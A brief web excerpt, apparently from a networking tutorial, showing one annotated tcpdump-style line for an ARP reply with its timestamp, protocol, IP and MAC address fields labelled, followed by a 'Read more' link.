20:50:37.333997 [timestamp] arp [protocol] reply 192.168.2.1 [destination IP] is-at 0:a0:c5:4b:52: fc [MAC address]
Read more »